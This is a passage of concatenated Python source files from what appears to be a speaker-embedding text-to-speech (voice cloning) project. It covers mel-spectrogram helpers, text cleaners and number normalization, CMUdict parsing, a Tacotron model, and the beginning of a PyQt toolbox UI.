np.linalg.pinv(_build_mel_basis(hparams)) return np.maximum(1e-10, np.dot(_inv_mel_basis, mel_spectrogram)) def _build_mel_basis(hparams): assert hparams.fmax <= hparams.sample_rate // 2 return librosa.filters.mel(hparams.sample_rate, hparams.n_fft, n_mels=hparams.num_mels, fmin=hparams.fmin, fmax=hparams.fmax) def _amp_to_db(x, hparams): min_level = np.exp(hparams.min_level_db / 20 * np.log(10)) return 20 * np.log10(np.maximum(min_level, x)) def _db_to_amp(x): return np.power(10.0, (x) * 0.05) def _normalize(S, hparams): if hparams.allow_clipping_in_normalization: if hparams.symmetric_mels: return np.clip((2 * hparams.max_abs_value) * ((S - hparams.min_level_db) / (-hparams.min_level_db)) - hparams.max_abs_value, -hparams.max_abs_value, hparams.max_abs_value) else: return np.clip(hparams.max_abs_value * ((S - hparams.min_level_db) / (-hparams.min_level_db)), 0, hparams.max_abs_value) assert S.max() <= 0 and S.min() - hparams.min_level_db >= 0 if hparams.symmetric_mels: return (2 * hparams.max_abs_value) * ((S - hparams.min_level_db) / (-hparams.min_level_db)) - hparams.max_abs_value else: return hparams.max_abs_value * ((S - hparams.min_level_db) / (-hparams.min_level_db)) def _denormalize(D, hparams): if hparams.allow_clipping_in_normalization: if hparams.symmetric_mels: return (((np.clip(D, -hparams.max_abs_value, hparams.max_abs_value) + hparams.max_abs_value) * 
-hparams.min_level_db / (2 * hparams.max_abs_value)) + hparams.min_level_db) else: return ((np.clip(D, 0, hparams.max_abs_value) * -hparams.min_level_db / hparams.max_abs_value) + hparams.min_level_db) if hparams.symmetric_mels: return (((D + hparams.max_abs_value) * -hparams.min_level_db / (2 * hparams.max_abs_value)) + hparams.min_level_db) else: return ((D * -hparams.min_level_db / hparams.max_abs_value) + hparams.min_level_db) File: synthesizer/utils/plot.py import numpy as np def split_title_line(title_text, max_words=5): """ A function that splits any string based on specific character (returning it with the string), with maximum number of words on it """ seq = title_text.split() return "\n".join([" ".join(seq[i:i + max_words]) for i in range(0, len(seq), max_words)]) def plot_alignment(alignment, path, title=None, split_title=False, max_len=None): import matplotlib matplotlib.use("Agg") import matplotlib.pyplot as plt if max_len is not None: alignment = alignment[:, :max_len] fig = plt.figure(figsize=(8, 6)) ax = fig.add_subplot(111) im = ax.imshow( alignment, aspect="auto", origin="lower", interpolation="none") fig.colorbar(im, ax=ax) xlabel = "Decoder timestep" if split_title: title = split_title_line(title) plt.xlabel(xlabel) plt.title(title) plt.ylabel("Encoder timestep") plt.tight_layout() plt.savefig(path, format="png") plt.close() def plot_spectrogram(pred_spectrogram, path, title=None, split_title=False, target_spectrogram=None, max_len=None, auto_aspect=False): import matplotlib matplotlib.use("Agg") import matplotlib.pyplot as plt if max_len is not None: target_spectrogram = target_spectrogram[:max_len] pred_spectrogram = pred_spectrogram[:max_len] if split_title: title = split_title_line(title) fig = plt.figure(figsize=(10, 8)) # Set common labels fig.text(0.5, 0.18, title, horizontalalignment="center", fontsize=16) #target spectrogram subplot if target_spectrogram is not None: ax1 = fig.add_subplot(311) ax2 = fig.add_subplot(312) if auto_aspect: im = ax1.imshow(np.rot90(target_spectrogram), aspect="auto", interpolation="none") else: im = ax1.imshow(np.rot90(target_spectrogram), interpolation="none") ax1.set_title("Target Mel-Spectrogram") fig.colorbar(mappable=im, shrink=0.65, orientation="horizontal", ax=ax1) ax2.set_title("Predicted Mel-Spectrogram") else: ax2 = fig.add_subplot(211) if auto_aspect: im = ax2.imshow(np.rot90(pred_spectrogram), aspect="auto", interpolation="none") else: im = ax2.imshow(np.rot90(pred_spectrogram), interpolation="none") fig.colorbar(mappable=im, shrink=0.65, orientation="horizontal", ax=ax2) plt.tight_layout() plt.savefig(path, format="png") plt.close() File: synthesizer/utils/_cmudict.py import re valid_symbols = [ "AA", "AA0", "AA1", "AA2", "AE", "AE0", "AE1", "AE2", "AH", "AH0", "AH1", "AH2", "AO", "AO0", "AO1", "AO2", "AW", "AW0", "AW1", "AW2", "AY", "AY0", "AY1", "AY2", "B", "CH", "D", "DH", "EH", "EH0", "EH1", "EH2", "ER", "ER0", "ER1", "ER2", "EY", "EY0", "EY1", "EY2", "F", "G", "HH", "IH", "IH0", "IH1", "IH2", "IY", "IY0", "IY1", "IY2", "JH", "K", "L", "M", "N", "NG", "OW", "OW0", "OW1", "OW2", "OY", "OY0", "OY1", "OY2", "P", "R", "S", "SH", "T", "TH", "UH", "UH0", "UH1", "UH2", "UW", "UW0", "UW1", "UW2", "V", "W", "Y", "Z", "ZH" ] _valid_symbol_set = set(valid_symbols) class CMUDict: """Thin wrapper around CMUDict data. 
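
    Hypothetical usage, assuming a local copy of the dictionary file:

        cmudict = CMUDict("cmudict-0.7b.txt")
        cmudict.lookup("python")  # -> a list like ["P AY1 TH AA0 N"]
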
http://www.speech.cs.cmu.edu/cgi-bin/cmudict""" def __init__(self, file_or_path, keep_ambiguous=True): if isinstance(file_or_path, str): with open(file_or_path, encoding="latin-1") as f: entries = _parse_cmudict(f) else: entries = _parse_cmudict(file_or_path) if not keep_ambiguous: entries = {word: pron for word, pron in entries.items() if len(pron) == 1} self._entries = entries def __len__(self): return len(self._entries) def lookup(self, word): """Returns list of ARPAbet pronunciations of the given word.""" return self._entries.get(word.upper()) _alt_re = re.compile(r"\([0-9]+\)") def _parse_cmudict(file): cmudict = {} for line in file: if len(line) and (line[0] >= "A" and line[0] <= "Z" or line[0] == "'"): parts = line.split(" ") word = re.sub(_alt_re, "", parts[0]) pronunciation = _get_pronunciation(parts[1]) if pronunciation: if word in cmudict: cmudict[word].append(pronunciation) else: cmudict[word] = [pronunciation] return cmudict def _get_pronunciation(s): parts = s.strip().split(" ") for part in parts: if part not in _valid_symbol_set: return None return " ".join(parts) File: synthesizer/utils/__init__.py import torch _output_ref = None _replicas_ref = None def data_parallel_workaround(model, *input): global _output_ref global _replicas_ref device_ids = list(range(torch.cuda.device_count())) output_device = device_ids[0] replicas = torch.nn.parallel.replicate(model, device_ids) # input.shape = (num_args, batch, ...) inputs = torch.nn.parallel.scatter(input, device_ids) # inputs.shape = (num_gpus, num_args, batch/num_gpus, ...) replicas = replicas[:len(inputs)] outputs = torch.nn.parallel.parallel_apply(replicas, inputs) y_hat = torch.nn.parallel.gather(outputs, output_device) _output_ref = outputs _replicas_ref = replicas return y_hat class ValueWindow(): def __init__(self, window_size=100): self._window_size = window_size self._values = [] def append(self, x): self._values = self._values[-(self._window_size - 1):] + [x] @property def sum(self): return sum(self._values) @property def count(self): return len(self._values) @property def average(self): return self.sum / max(1, self.count) def reset(self): self._values = [] File: synthesizer/utils/numbers.py import re import inflect _inflect = inflect.engine() _comma_number_re = re.compile(r"([0-9][0-9\,]+[0-9])") _decimal_number_re = re.compile(r"([0-9]+\.[0-9]+)") _pounds_re = re.compile(r"£([0-9\,]*[0-9]+)") _dollars_re = re.compile(r"\$([0-9\.\,]*[0-9]+)") _ordinal_re = re.compile(r"[0-9]+(st|nd|rd|th)") _number_re = re.compile(r"[0-9]+") def _remove_commas(m): return m.group(1).replace(",", "") def _expand_decimal_point(m): return m.group(1).replace(".", " point ") def _expand_dollars(m): match = m.group(1) parts = match.split(".") if len(parts) > 2: return match + " dollars" # Unexpected format dollars = int(parts[0]) if parts[0] else 0 cents = int(parts[1]) if len(parts) > 1 and parts[1] else 0 if dollars and cents: dollar_unit = "dollar" if dollars == 1 else "dollars" cent_unit = "cent" if cents == 1 else "cents" return "%s %s, %s %s" % (dollars, dollar_unit, cents, cent_unit) elif dollars: dollar_unit = "dollar" if dollars == 1 else "dollars" return "%s %s" % (dollars, dollar_unit) elif cents: cent_unit = "cent" if cents == 1 else "cents" return "%s %s" % (cents, cent_unit) else: return "zero dollars" def _expand_ordinal(m): return _inflect.number_to_words(m.group(0)) def _expand_number(m): num = int(m.group(0)) if num > 1000 and num < 3000: if num == 2000: return "two thousand" elif num > 2000 and num < 2010: return "two 
thousand " + _inflect.number_to_words(num % 100) elif num % 100 == 0: return _inflect.number_to_words(num // 100) + " hundred" else: return _inflect.number_to_words(num, andword="", zero="oh", group=2).replace(", ", " ") else: return _inflect.number_to_words(num, andword="") def normalize_numbers(text): text = re.sub(_comma_number_re, _remove_commas, text) text = re.sub(_pounds_re, r"\1 pounds", text) text = re.sub(_dollars_re, _expand_dollars, text) text = re.sub(_decimal_number_re, _expand_decimal_point, text) text = re.sub(_ordinal_re, _expand_ordinal, text) text = re.sub(_number_re, _expand_number, text) return text File: synthesizer/utils/symbols.py """ Defines the set of symbols used in text input to the model. The default is a set of ASCII characters that works well for English or text that has been run through Unidecode. For other data, you can modify _characters. See TRAINING_DATA.md for details. """ # from . import cmudict _pad = "_" _eos = "~" _characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!\'\"(),-.:;? " # Prepend "@" to ARPAbet symbols to ensure uniqueness (some are the same as uppercase letters): #_arpabet = ["@' + s for s in cmudict.valid_symbols] # Export all symbols: symbols = [_pad, _eos] + list(_characters) #+ _arpabet File: synthesizer/utils/text.py from synthesizer.utils.symbols import symbols from synthesizer.utils import cleaners import re # Mappings from symbol to numeric ID and vice versa: _symbol_to_id = {s: i for i, s in enumerate(symbols)} _id_to_symbol = {i: s for i, s in enumerate(symbols)} # Regular expression matching text enclosed in curly braces: _curly_re = re.compile(r"(.*?)\{(.+?)\}(.*)") def text_to_sequence(text, cleaner_names): """Converts a string of text to a sequence of IDs corresponding to the symbols in the text. The text can optionally have ARPAbet sequences enclosed in curly braces embedded in it. For example, "Turn left on {HH AW1 S S T AH0 N} Street." Args: text: string to convert to a sequence cleaner_names: names of the cleaner functions to run the text through Returns: List of integers corresponding to the symbols in the text """ sequence = [] # Check for curly braces and treat their contents as ARPAbet: while len(text): m = _curly_re.match(text) if not m: sequence += _symbols_to_sequence(_clean_text(text, cleaner_names)) break sequence += _symbols_to_sequence(_clean_text(m.group(1), cleaner_names)) sequence += _arpabet_to_sequence(m.group(2)) text = m.group(3) # Append EOS token sequence.append(_symbol_to_id["~"]) return sequence def sequence_to_text(sequence): """Converts a sequence of IDs back to a string""" result = "" for symbol_id in sequence: if symbol_id in _id_to_symbol: s = _id_to_symbol[symbol_id] # Enclose ARPAbet back in curly braces: if len(s) > 1 and s[0] == "@": s = "{%s}" % s[1:] result += s return result.replace("}{", " ") def _clean_text(text, cleaner_names): for name in cleaner_names: cleaner = getattr(cleaners, name) if not cleaner: raise Exception("Unknown cleaner: %s" % name) text = cleaner(text) return text def _symbols_to_sequence(symbols): return [_symbol_to_id[s] for s in symbols if _should_keep_symbol(s)] def _arpabet_to_sequence(text): return _symbols_to_sequence(["@" + s for s in text.split()]) def _should_keep_symbol(s): return s in _symbol_to_id and s not in ("_", "~") File: synthesizer/utils/cleaners.py """ Cleaners are transformations that run over the input text at both training and eval time. 
Cleaners can be selected by passing a comma-delimited list of cleaner names as the "cleaners" hyperparameter. Some cleaners are English-specific. You"ll typically want to use: 1. "english_cleaners" for English text 2. "transliteration_cleaners" for non-English text that can be transliterated to ASCII using the Unidecode library (https://pypi.python.org/pypi/Unidecode) 3. "basic_cleaners" if you do not want to transliterate (in this case, you should also update the symbols in symbols.py to match your data). """ import re from unidecode import unidecode from synthesizer.utils.numbers import normalize_numbers # Regular expression matching whitespace: _whitespace_re = re.compile(r"\s+") # List of (regular expression, replacement) pairs for abbreviations: _abbreviations = [(re.compile("\\b%s\\." % x[0], re.IGNORECASE), x[1]) for x in [ ("mrs", "misess"), ("mr", "mister"), ("dr", "doctor"), ("st", "saint"), ("co", "company"), ("jr", "junior"), ("maj", "major"), ("gen", "general"), ("drs", "doctors"), ("rev", "reverend"), ("lt", "lieutenant"), ("hon", "honorable"), ("sgt", "sergeant"), ("capt", "captain"), ("esq", "esquire"), ("ltd", "limited"), ("col", "colonel"), ("ft", "fort"), ]] def expand_abbreviations(text): for regex, replacement in _abbreviations: text = re.sub(regex, replacement, text) return text def expand_numbers(text): return normalize_numbers(text) def lowercase(text): """lowercase input tokens.""" return text.lower() def collapse_whitespace(text): return re.sub(_whitespace_re, " ", text) def convert_to_ascii(text): return unidecode(text) def basic_cleaners(text): """Basic pipeline that lowercases and collapses whitespace without transliteration.""" text = lowercase(text) text = collapse_whitespace(text) return text def transliteration_cleaners(text): """Pipeline for non-English text that transliterates to ASCII.""" text = convert_to_ascii(text) text = lowercase(text) text = collapse_whitespace(text) return text def english_cleaners(text): """Pipeline for English text, including number and abbreviation expansion.""" text = convert_to_ascii(text) text = lowercase(text) text = expand_numbers(text) text = expand_abbreviations(text) text = collapse_whitespace(text) return text File: synthesizer/models/tacotron.py import os import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from pathlib import Path from typing import Union class HighwayNetwork(nn.Module): def __init__(self, size): super().__init__() self.W1 = nn.Linear(size, size) self.W2 = nn.Linear(size, size) self.W1.bias.data.fill_(0.) def forward(self, x): x1 = self.W1(x) x2 = self.W2(x) g = torch.sigmoid(x2) y = g * F.relu(x1) + (1. 
- g) * x return y class Encoder(nn.Module): def __init__(self, embed_dims, num_chars, encoder_dims, K, num_highways, dropout): super().__init__() prenet_dims = (encoder_dims, encoder_dims) cbhg_channels = encoder_dims self.embedding = nn.Embedding(num_chars, embed_dims) self.pre_net = PreNet(embed_dims, fc1_dims=prenet_dims[0], fc2_dims=prenet_dims[1], dropout=dropout) self.cbhg = CBHG(K=K, in_channels=cbhg_channels, channels=cbhg_channels, proj_channels=[cbhg_channels, cbhg_channels], num_highways=num_highways) def forward(self, x, speaker_embedding=None): x = self.embedding(x) x = self.pre_net(x) x.transpose_(1, 2) x = self.cbhg(x) if speaker_embedding is not None: x = self.add_speaker_embedding(x, speaker_embedding) return x def add_speaker_embedding(self, x, speaker_embedding): # SV2TTS # The input x is the encoder output and is a 3D tensor with size (batch_size, num_chars, tts_embed_dims) # When training, speaker_embedding is also a 2D tensor with size (batch_size, speaker_embedding_size) # (for inference, speaker_embedding is a 1D tensor with size (speaker_embedding_size)) # This concats the speaker embedding for each char in the encoder output # Save the dimensions as human-readable names batch_size = x.size()[0] num_chars = x.size()[1] if speaker_embedding.dim() == 1: idx = 0 else: idx = 1 # Start by making a copy of each speaker embedding to match the input text length # The output of this has size (batch_size, num_chars * tts_embed_dims) speaker_embedding_size = speaker_embedding.size()[idx] e = speaker_embedding.repeat_interleave(num_chars, dim=idx) # Reshape it and transpose e = e.reshape(batch_size, speaker_embedding_size, num_chars) e = e.transpose(1, 2) # Concatenate the tiled speaker embedding with the encoder output x = torch.cat((x, e), 2) return x class BatchNormConv(nn.Module): def __init__(self, in_channels, out_channels, kernel, relu=True): super().__init__() self.conv = nn.Conv1d(in_channels, out_channels, kernel, stride=1, padding=kernel // 2, bias=False) self.bnorm = nn.BatchNorm1d(out_channels) self.relu = relu def forward(self, x): x = self.conv(x) x = F.relu(x) if self.relu is True else x return self.bnorm(x) class CBHG(nn.Module): def __init__(self, K, in_channels, channels, proj_channels, num_highways): super().__init__() # List of all rnns to call `flatten_parameters()` on self._to_flatten = [] self.bank_kernels = [i for i in range(1, K + 1)] self.conv1d_bank = nn.ModuleList() for k in self.bank_kernels: conv = BatchNormConv(in_channels, channels, k) self.conv1d_bank.append(conv) self.maxpool = nn.MaxPool1d(kernel_size=2, stride=1, padding=1) self.conv_project1 = BatchNormConv(len(self.bank_kernels) * channels, proj_channels[0], 3) self.conv_project2 = BatchNormConv(proj_channels[0], proj_channels[1], 3, relu=False) # Fix the highway input if necessary if proj_channels[-1] != channels: self.highway_mismatch = True self.pre_highway = nn.Linear(proj_channels[-1], channels, bias=False) else: self.highway_mismatch = False self.highways = nn.ModuleList() for i in range(num_highways): hn = HighwayNetwork(channels) self.highways.append(hn) self.rnn = nn.GRU(channels, channels // 2, batch_first=True, bidirectional=True) self._to_flatten.append(self.rnn) # Avoid fragmentation of RNN parameters and associated warning self._flatten_parameters() def forward(self, x): # Although we `_flatten_parameters()` on init, when using DataParallel # the model gets replicated, making it no longer guaranteed that the # weights are contiguous in GPU memory. 
        # Hence, we must call it again.
        self._flatten_parameters()

        # Save these for later
        residual = x
        seq_len = x.size(-1)
        conv_bank = []

        # Convolution Bank
        for conv in self.conv1d_bank:
            c = conv(x)  # Convolution
            conv_bank.append(c[:, :, :seq_len])

        # Stack along the channel axis
        conv_bank = torch.cat(conv_bank, dim=1)

        # dump the last padding to fit residual
        x = self.maxpool(conv_bank)[:, :, :seq_len]

        # Conv1d projections
        x = self.conv_project1(x)
        x = self.conv_project2(x)

        # Residual Connect
        x = x + residual

        # Through the highways
        x = x.transpose(1, 2)
        if self.highway_mismatch is True:
            x = self.pre_highway(x)
        for h in self.highways:
            x = h(x)

        # And then the RNN
        x, _ = self.rnn(x)
        return x

    def _flatten_parameters(self):
        """Calls `flatten_parameters` on all the rnns used by the WaveRNN. Used
        to improve efficiency and avoid PyTorch yelling at us."""
        [m.flatten_parameters() for m in self._to_flatten]


class PreNet(nn.Module):
    def __init__(self, in_dims, fc1_dims=256, fc2_dims=128, dropout=0.5):
        super().__init__()
        self.fc1 = nn.Linear(in_dims, fc1_dims)
        self.fc2 = nn.Linear(fc1_dims, fc2_dims)
        self.p = dropout

    def forward(self, x):
        x = self.fc1(x)
        x = F.relu(x)
        x = F.dropout(x, self.p, training=True)
        x = self.fc2(x)
        x = F.relu(x)
        x = F.dropout(x, self.p, training=True)
        return x


class Attention(nn.Module):
    def __init__(self, attn_dims):
        super().__init__()
        self.W = nn.Linear(attn_dims, attn_dims, bias=False)
        self.v = nn.Linear(attn_dims, 1, bias=False)

    def forward(self, encoder_seq_proj, query, t):
        # print(encoder_seq_proj.shape)
        # Transform the query vector
        query_proj = self.W(query).unsqueeze(1)

        # Compute the scores
        u = self.v(torch.tanh(encoder_seq_proj + query_proj))
        scores = F.softmax(u, dim=1)

        return scores.transpose(1, 2)


class LSA(nn.Module):
    def __init__(self, attn_dim, kernel_size=31, filters=32):
        super().__init__()
        self.conv = nn.Conv1d(1, filters, padding=(kernel_size - 1) // 2, kernel_size=kernel_size, bias=True)
        self.L = nn.Linear(filters, attn_dim, bias=False)
        self.W = nn.Linear(attn_dim, attn_dim, bias=True)  # Include the attention bias in this term
        self.v = nn.Linear(attn_dim, 1, bias=False)
        self.cumulative = None
        self.attention = None

    def init_attention(self, encoder_seq_proj):
        device = next(self.parameters()).device  # use same device as parameters
        b, t, c = encoder_seq_proj.size()
        self.cumulative = torch.zeros(b, t, device=device)
        self.attention = torch.zeros(b, t, device=device)

    def forward(self, encoder_seq_proj, query, t, chars):
        if t == 0:
            self.init_attention(encoder_seq_proj)

        processed_query = self.W(query).unsqueeze(1)

        location = self.cumulative.unsqueeze(1)
        processed_loc = self.L(self.conv(location).transpose(1, 2))

        u = self.v(torch.tanh(processed_query + encoder_seq_proj + processed_loc))
        u = u.squeeze(-1)

        # Mask zero padding chars
        u = u * (chars != 0).float()

        # Smooth Attention
        # scores = torch.sigmoid(u) / torch.sigmoid(u).sum(dim=1, keepdim=True)
        scores = F.softmax(u, dim=1)
        self.attention = scores
        self.cumulative = self.cumulative + self.attention

        return scores.unsqueeze(-1).transpose(1, 2)


class Decoder(nn.Module):
    # Class variable because its value doesn't change between classes
    # yet ought to be scoped by class because it's a property of a Decoder
    max_r = 20

    def __init__(self, n_mels, encoder_dims, decoder_dims, lstm_dims,
                 dropout, speaker_embedding_size):
        super().__init__()
        self.register_buffer("r", torch.tensor(1, dtype=torch.int))
        self.n_mels = n_mels
        prenet_dims = (decoder_dims * 2, decoder_dims * 2)
        self.prenet = PreNet(n_mels, fc1_dims=prenet_dims[0],
fc2_dims=prenet_dims[1], dropout=dropout) self.attn_net = LSA(decoder_dims) self.attn_rnn = nn.GRUCell(encoder_dims + prenet_dims[1] + speaker_embedding_size, decoder_dims) self.rnn_input = nn.Linear(encoder_dims + decoder_dims + speaker_embedding_size, lstm_dims) self.res_rnn1 = nn.LSTMCell(lstm_dims, lstm_dims) self.res_rnn2 = nn.LSTMCell(lstm_dims, lstm_dims) self.mel_proj = nn.Linear(lstm_dims, n_mels * self.max_r, bias=False) self.stop_proj = nn.Linear(encoder_dims + speaker_embedding_size + lstm_dims, 1) def zoneout(self, prev, current, p=0.1): device = next(self.parameters()).device # Use same device as parameters mask = torch.zeros(prev.size(), device=device).bernoulli_(p) return prev * mask + current * (1 - mask) def forward(self, encoder_seq, encoder_seq_proj, prenet_in, hidden_states, cell_states, context_vec, t, chars): # Need this for reshaping mels batch_size = encoder_seq.size(0) # Unpack the hidden and cell states attn_hidden, rnn1_hidden, rnn2_hidden = hidden_states rnn1_cell, rnn2_cell = cell_states # PreNet for the Attention RNN prenet_out = self.prenet(prenet_in) # Compute the Attention RNN hidden state attn_rnn_in = torch.cat([context_vec, prenet_out], dim=-1) attn_hidden = self.attn_rnn(attn_rnn_in.squeeze(1), attn_hidden) # Compute the attention scores scores = self.attn_net(encoder_seq_proj, attn_hidden, t, chars) # Dot product to create the context vector context_vec = scores @ encoder_seq context_vec = context_vec.squeeze(1) # Concat Attention RNN output w. Context Vector & project x = torch.cat([context_vec, attn_hidden], dim=1) x = self.rnn_input(x) # Compute first Residual RNN rnn1_hidden_next, rnn1_cell = self.res_rnn1(x, (rnn1_hidden, rnn1_cell)) if self.training: rnn1_hidden = self.zoneout(rnn1_hidden, rnn1_hidden_next) else: rnn1_hidden = rnn1_hidden_next x = x + rnn1_hidden # Compute second Residual RNN rnn2_hidden_next, rnn2_cell = self.res_rnn2(x, (rnn2_hidden, rnn2_cell)) if self.training: rnn2_hidden = self.zoneout(rnn2_hidden, rnn2_hidden_next) else: rnn2_hidden = rnn2_hidden_next x = x + rnn2_hidden # Project Mels mels = self.mel_proj(x) mels = mels.view(batch_size, self.n_mels, self.max_r)[:, :, :self.r] hidden_states = (attn_hidden, rnn1_hidden, rnn2_hidden) cell_states = (rnn1_cell, rnn2_cell) # Stop token prediction s = torch.cat((x, context_vec), dim=1) s = self.stop_proj(s) stop_tokens = torch.sigmoid(s) return mels, scores, hidden_states, cell_states, context_vec, stop_tokens class Tacotron(nn.Module): def __init__(self, embed_dims, num_chars, encoder_dims, decoder_dims, n_mels, fft_bins, postnet_dims, encoder_K, lstm_dims, postnet_K, num_highways, dropout, stop_threshold, speaker_embedding_size): super().__init__() self.n_mels = n_mels self.lstm_dims = lstm_dims self.encoder_dims = encoder_dims self.decoder_dims = decoder_dims self.speaker_embedding_size = speaker_embedding_size self.encoder = Encoder(embed_dims, num_chars, encoder_dims, encoder_K, num_highways, dropout) self.encoder_proj = nn.Linear(encoder_dims + speaker_embedding_size, decoder_dims, bias=False) self.decoder = Decoder(n_mels, encoder_dims, decoder_dims, lstm_dims, dropout, speaker_embedding_size) self.postnet = CBHG(postnet_K, n_mels, postnet_dims, [postnet_dims, fft_bins], num_highways) self.post_proj = nn.Linear(postnet_dims, fft_bins, bias=False) self.init_model() self.num_params() self.register_buffer("step", torch.zeros(1, dtype=torch.long)) self.register_buffer("stop_threshold", torch.tensor(stop_threshold, dtype=torch.float32)) @property def r(self): return 
self.decoder.r.item() @r.setter def r(self, value): self.decoder.r = self.decoder.r.new_tensor(value, requires_grad=False) def forward(self, x, m, speaker_embedding): device = next(self.parameters()).device # use same device as parameters self.step += 1 batch_size, _, steps = m.size() # Initialise all hidden states and pack into tuple attn_hidden = torch.zeros(batch_size, self.decoder_dims, device=device) rnn1_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) rnn2_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) hidden_states = (attn_hidden, rnn1_hidden, rnn2_hidden) # Initialise all lstm cell states and pack into tuple rnn1_cell = torch.zeros(batch_size, self.lstm_dims, device=device) rnn2_cell = torch.zeros(batch_size, self.lstm_dims, device=device) cell_states = (rnn1_cell, rnn2_cell) # <GO> Frame for start of decoder loop go_frame = torch.zeros(batch_size, self.n_mels, device=device) # Need an initial context vector context_vec = torch.zeros(batch_size, self.encoder_dims + self.speaker_embedding_size, device=device) # SV2TTS: Run the encoder with the speaker embedding # The projection avoids unnecessary matmuls in the decoder loop encoder_seq = self.encoder(x, speaker_embedding) encoder_seq_proj = self.encoder_proj(encoder_seq) # Need a couple of lists for outputs mel_outputs, attn_scores, stop_outputs = [], [], [] # Run the decoder loop for t in range(0, steps, self.r): prenet_in = m[:, :, t - 1] if t > 0 else go_frame mel_frames, scores, hidden_states, cell_states, context_vec, stop_tokens = \ self.decoder(encoder_seq, encoder_seq_proj, prenet_in, hidden_states, cell_states, context_vec, t, x) mel_outputs.append(mel_frames) attn_scores.append(scores) stop_outputs.extend([stop_tokens] * self.r) # Concat the mel outputs into sequence mel_outputs = torch.cat(mel_outputs, dim=2) # Post-Process for Linear Spectrograms postnet_out = self.postnet(mel_outputs) linear = self.post_proj(postnet_out) linear = linear.transpose(1, 2) # For easy visualisation attn_scores = torch.cat(attn_scores, 1) # attn_scores = attn_scores.cpu().data.numpy() stop_outputs = torch.cat(stop_outputs, 1) return mel_outputs, linear, attn_scores, stop_outputs def generate(self, x, speaker_embedding=None, steps=2000): self.eval() device = next(self.parameters()).device # use same device as parameters batch_size, _ = x.size() # Need to initialise all hidden states and pack into tuple for tidyness attn_hidden = torch.zeros(batch_size, self.decoder_dims, device=device) rnn1_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) rnn2_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) hidden_states = (attn_hidden, rnn1_hidden, rnn2_hidden) # Need to initialise all lstm cell states and pack into tuple for tidyness rnn1_cell = torch.zeros(batch_size, self.lstm_dims, device=device) rnn2_cell = torch.zeros(batch_size, self.lstm_dims, device=device) cell_states = (rnn1_cell, rnn2_cell) # Need a <GO> Frame for start of decoder loop go_frame = torch.zeros(batch_size, self.n_mels, device=device) # Need an initial context vector context_vec = torch.zeros(batch_size, self.encoder_dims + self.speaker_embedding_size, device=device) # SV2TTS: Run the encoder with the speaker embedding # The projection avoids unnecessary matmuls in the decoder loop encoder_seq = self.encoder(x, speaker_embedding) encoder_seq_proj = self.encoder_proj(encoder_seq) # Need a couple of lists for outputs mel_outputs, attn_scores, stop_outputs = [], [], [] # Run the decoder loop for t in range(0, steps, self.r): 
prenet_in = mel_outputs[-1][:, :, -1] if t > 0 else go_frame mel_frames, scores, hidden_states, cell_states, context_vec, stop_tokens = \ self.decoder(encoder_seq, encoder_seq_proj, prenet_in, hidden_states, cell_states, context_vec, t, x) mel_outputs.append(mel_frames) attn_scores.append(scores) stop_outputs.extend([stop_tokens] * self.r) # Stop the loop when all stop tokens in batch exceed threshold if (stop_tokens > 0.5).all() and t > 10: break # Concat the mel outputs into sequence mel_outputs = torch.cat(mel_outputs, dim=2) # Post-Process for Linear Spectrograms postnet_out = self.postnet(mel_outputs) linear = self.post_proj(postnet_out) linear = linear.transpose(1, 2) # For easy visualisation attn_scores = torch.cat(attn_scores, 1) stop_outputs = torch.cat(stop_outputs, 1) self.train() return mel_outputs, linear, attn_scores def init_model(self): for p in self.parameters(): if p.dim() > 1: nn.init.xavier_uniform_(p) def get_step(self): return self.step.data.item() def reset_step(self): # assignment to parameters or buffers is overloaded, updates internal dict entry self.step = self.step.data.new_tensor(1) def log(self, path, msg): with open(path, "a") as f: print(msg, file=f) def load(self, path, optimizer=None): # Use device of model params as location for loaded state device = next(self.parameters()).device checkpoint = torch.load(str(path), map_location=device) self.load_state_dict(checkpoint["model_state"]) if "optimizer_state" in checkpoint and optimizer is not None: optimizer.load_state_dict(checkpoint["optimizer_state"]) def save(self, path, optimizer=None): if optimizer is not None: torch.save({ "model_state": self.state_dict(), "optimizer_state": optimizer.state_dict(), }, str(path)) else: torch.save({ "model_state": self.state_dict(), }, str(path)) def num_params(self, print_out=True): parameters = filter(lambda p: p.requires_grad, self.parameters()) parameters = sum([np.prod(p.size()) for p in parameters]) / 1_000_000 if print_out: print("Trainable Parameters: %.3fM" % parameters) return parameters File: toolbox/utterance.py from collections import namedtuple Utterance = namedtuple("Utterance", "name speaker_name wav spec embed partial_embeds synth") Utterance.__eq__ = lambda x, y: x.name == y.name Utterance.__hash__ = lambda x: hash(x.name) File: toolbox/ui.py import sys from pathlib import Path from time import sleep from typing import List, Set from warnings import filterwarnings, warn import matplotlib.pyplot as plt import numpy as np import sounddevice as sd import soundfile as sf import umap from PyQt5.QtCore import Qt, QStringListModel from PyQt5.QtWidgets import * from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas from encoder.inference import plot_embedding_as_heatmap from toolbox.utterance import Utterance filterwarnings("ignore") colormap = np.array([ [0, 127, 70], [255, 0, 0], [255, 217, 38], [0, 135, 255], [165, 0, 165], [255, 167, 255], [97, 142, 151], [0, 255, 255], [255, 96, 38], [142, 76, 0], [33, 0, 127], [0, 0, 0], [183, 183, 183], [76, 255, 0], ], dtype=np.float) / 255 default_text = \ "Welcome to the toolbox! To begin, load an utterance from your datasets or record one " \ "yourself.\nOnce its embedding has been created, you can synthesize any text written here.\n" \ "The synthesizer expects to generate " \ "outputs that are somewhere between 5 and 12 seconds.\nTo mark breaks, write a new line. " \ "Each line will be treated separately.\nThen, they are joined together to make the final " \ "spectrogram. 
